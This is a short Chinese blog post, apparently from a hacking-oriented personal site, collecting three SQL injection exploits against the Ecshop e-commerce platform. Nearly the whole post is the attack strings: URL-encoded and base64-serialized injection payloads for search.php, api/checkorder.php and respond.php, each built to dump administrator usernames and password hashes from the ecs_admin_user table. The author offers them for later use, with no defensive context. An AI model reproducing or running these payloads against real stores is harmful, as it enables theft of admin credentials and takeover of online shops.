About

不要太把自己当回事,无论自己多么优秀,在遥远的地方可能还有一些十五岁的年轻人每天花20小时来争取做的更好!没有什么不能被改变就像没有什么值得被改变.

By F4usT.

    • Jan

    6

    Ecshop 漏洞集合

    • 0 Comments
    • 漏洞收藏
    • 发布:admin
    • 引用:0
    • 浏览:

    一、

    EXP:search.php?encode=YToxOntzOjQ6ImF0dHIiO2E6MTp7czoxMjU6IjEnKSBhbmQgMT0yIE

    dST1VQIEJZIGdvb2RzX2lkIHVuaW9uIGFsbCBzZWxlY3QgY29uY2F0KHVzZXJfbmFtZSwweD

    NhLHBhc3N3b3JkLCciXCcpIHVuaW9uIHNlbGVjdCAxIyInKSwxIGZyb20gZWNzX2FkbWluX3V

    zZXIjIjtzOjE6IjEiO319

    二、

    Exp:

    api/checkorder.php?username=%ce%27%20and%201=2%20union%20select%201%20and%20%28select%201%20from%28select%20count%28*%29,concat%28%28Select%20concat%280x5b,user_name,0x3a,password,0x5d%29%20FROM%20ecs_admin_user%20limit%200,1%29,floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%20%23

    三、

    Exp:

    respond.php?code=tenpay&attach=voucher&sp_billno=1%20and(select%201%20from(select%20count(*),concat((select%20(select%20(SELECT%20concat(0x7e,0x27,count(*),0x27,0x7e)%20FROM%20`ecs`.ecs_admin_user))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1(这个是农村大牛发现的,其他的两个是在网上转载的,留着备用。)

    « Phpwind远程任意代码执行漏洞 T00ls 主域名于 2011-01-05 19:30 被劫持 »
    相关文章:
    Post Comment.

    发表评论